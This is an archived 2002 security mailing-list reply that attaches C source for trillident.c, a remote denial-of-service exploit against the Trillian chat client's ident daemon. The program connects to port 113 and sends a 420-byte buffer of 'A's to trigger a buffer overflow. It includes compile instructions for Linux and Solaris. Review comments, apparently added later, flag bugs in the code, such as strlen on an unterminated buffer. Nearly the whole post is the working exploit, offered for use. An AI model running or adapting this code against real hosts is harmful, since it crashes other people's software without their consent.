
List:       vulndiscuss
Subject:    [VulnDiscuss] Re: Trillian .74 and below, ident flaw.
From:       netmask {enZo} <netmask () enZ-o ! org>
Date:       2002-09-19 21:13:13

> Lance Fitz-Herbert (fitzies@hotmail.com) composed on Sep 18, 2002:

Hello Lance, out of boredom I wrote one that compiles on un*x

trillident.c is attached


netmask @ enZo

["trillident.c" (TEXT/PLAIN)]


/* Trillian .74, .73 remote DoS..  Trillian Pro 1.0                                   \
                
 *    Exploits buffer overflow in ident when sending over
 *    418 bytes. 
 *
 *    Really only works if people are on IRC (otherwise, the ident
 *    daemon shuts down..  And you've got to know they are running
 *    Trillian, obviously.
 *
 *    bug discovered by Lance Fitz-Herbert (aka phrizer) on 03 September 2002
 *
 *
 * Compile With:
 * Linux: gcc -o trillident trillident.c
 * Solaris: gcc -o trillident trillident.c -lsocket -lnsl
 * Windows: Use someone else's code.

                                    ZZZZZZZZZZZZZZZZZZZ
                                    Z:::::::::::::::::Z
                  nnnn  nnnnnnnn    Z:::::::::::::::::Z   ooooooooooo
                  n:::nn::::::::nn  Z:::ZZZZZZZ::::::Z  oo:::::::::::oo
     eeeeeeeeeee  n::::::::::::::nn ZZZZZ  * Z::::::Z  o:::::::::::::::o
   ee:::::::::::eenn:::::::::::::::n      2 Z:::::Z    o:::::oooo::::::o
  e:::::::::::::::een:::::nnnn:::::n     0 Z:::::Z     o::::o  o::o::::o
 e::::::eeeee::::::en::::n    n::::n    0 Z:::::Z      o::::o o::oo::::o
 e:::::e     e:::::en::::n    n::::n   2 Z:::::Z       o::::oo::o o::::o
 e::::::eeeee::::::en::::n    n::::n  * Z:::::Z        o::::o::o  o::::o
 e::::::::::::::::e n::::n    n::::n   Z:::::Z         o::::::oooo:::::o
 e:::::eeeeeeeeeee  n::::n    n::::nZZZ:::::Z     ZZZZZo:::::::::::::::o
 e::::::e           n::::n    n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo
 e:::::::e          nnnnnn    nnnnnnZ:::::::::::::::::Z   ooooooooooo
  e:::::::eeeeeeeeee                Z:::::::::::::::::Z
   ee::::::::::::::e                ZZZZZZZZZZZZZZZZZZZ
    ee:::::::::::::e             \... www.enz-o.org .../
     eeeeeeeeeeeeee

(The above is radical ascii art.. Respect it. The below is a lame DoS. )
                                                                                      \
                
*/

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define ERR -1



void usage(char* argv0);
int dostrill(char *ip, int port);

int main(int argc, char *argv[])
{
	extern int optopt;
	extern char *optarg;
	int bad_args = 0;	/* counts option-parsing errors; any => usage() */
	int port = 113;		/* ident's well-known port, overridden by -p */
	int opt;

	/* Need at least a target word, and never more than five extra words. */
	if (argc < 2 || argc > 6) {
		usage(argv[0]);
	}

	for (;;) {
		opt = getopt(argc, argv, "vp:");
		if (opt == EOF) {
			break;
		}
		if (opt == 'p') {
			fprintf(stderr, "Using port %s\n", optarg);
			/* NOTE(review): strtol's endptr and errno are not checked,
			 * so a non-numeric operand silently becomes port 0 and an
			 * out-of-range one is truncated to int. */
			port = strtol(optarg, NULL, 10);
		} else if (opt == 'v') {
			fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
			fprintf(stderr, "written by: netmask@enZo\n\n");
			exit(0);
		} else if (opt == ':') {
			/* getopt only returns ':' when the optstring begins with
			 * ':'; "vp:" does not, so a missing -p operand arrives as
			 * '?' instead. Branch kept for parity with the original. */
			fprintf(stderr, "Option -%c requires an operand\n", optopt);
			bad_args++;
		} else if (opt == '?') {
			fprintf(stderr, "Unrecognized option: -%c\n", optopt);
			bad_args++;
		}
		/* any other return value is ignored, as before */
	}

	if (bad_args) {
		usage(argv[0]);
	}

	/* The target is the last argv word; nothing checks that it is not
	 * itself an option or a -p operand. */
	dostrill(argv[argc-1], port);
	fprintf(stderr, "Finished!\n");
	return 0;
} /* end main */

/* Print the banner and synopsis to stderr, then terminate with status 1.
 * argv0 is the program name as invoked and is only echoed back; this
 * function never returns. */
void usage(char* argv0)
{
	static const char synopsis[] =
		"-p \tPort to use\n"
		"-v \tPrint the program info\n";

	fputs("Trillian Ident DoS - [Sep 19, 2002]\n", stderr);
	fputs("Written by: netmask@enZo\n\n", stderr);
	fprintf(stderr, "Usage: %s [options] IP\n\n", argv0);
	fputs(synopsis, stderr);
	exit(1);
}

/*
 * dostrill - open one TCP connection to ip:port and write a buffer of 'A's.
 *
 * ip   : hostname or dotted-quad string; resolved with gethostbyname(),
 *        falling back to inet_addr() when resolution fails.
 * port : TCP port in host byte order (main() defaults it to 113).
 *
 * Returns 0 after the write, 0 from the address-parse failure branch
 * (which is unreachable, see below), and 1 when socket() or connect()
 * fails -- so the caller cannot tell success from a bad address.
 *
 * Review notes (code left as written):
 *   - buf is filled entirely with 'A' and never NUL-terminated, so the
 *     strlen(buf) passed to write() reads past the end of buf: undefined
 *     behaviour, and the byte count depends on whatever follows buf.
 *   - inet_addr() returns an unsigned in_addr_t, so the "< 0" test can
 *     never be true; an unparsable address (INADDR_NONE) is not rejected.
 *   - the socket is not closed on the connect() failure path.
 *   - write()'s return value is not checked.
 */
int dostrill(char *ip, int port)
{
	int s, r;
	char buf[420]; /* payload: 420 x 'A', no terminator (see strlen note above) */
	
	struct sockaddr_in addr;
	struct hostent *hp;
	memset((char *) &addr, '\0', sizeof(addr));
	addr.sin_family = AF_INET;
	/* Redundant: sin_addr is overwritten by both branches below. */
	addr.sin_addr.s_addr = inet_addr(ip);
	addr.sin_port = htons(port);
	memset(buf, 'A', 420);


	if ((hp = gethostbyname(ip)) != NULL) {
			/* h_length is int and sizeof is size_t, so this compares as
			 * unsigned; the assignment also modifies the hostent that the
			 * resolver returned (data owned by the library, not by us). */
			if (hp->h_length > sizeof(addr.sin_addr)) {
				hp->h_length = sizeof(addr.sin_addr); }
		memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length);
	}
	else {
		/* Never true: inet_addr() is unsigned. Failure would be
		 * addr.sin_addr.s_addr == INADDR_NONE. */
		if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {
			return(0);
			 }
	}



	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if (s == ERR) {
			fprintf(stderr, "Couldn't Create Socket\n");
			return 1;
	}
	
	
	r = connect(s, (struct sockaddr *) &addr, sizeof(addr));

	if (r == ERR) {
			fprintf(stderr, "Couldn't Establish Connection\n");
			return 1; /* leaks s: no close() on this path */
	}

	fprintf(stderr, "Connected to %s and sending buffer\n\n", ip);
	/* strlen() on an unterminated buffer: UB, length not under control;
	 * the write() result is also discarded. */
	write(s, buf, strlen(buf)); /* send buffer */

	close(s);
	return 0;
	

}



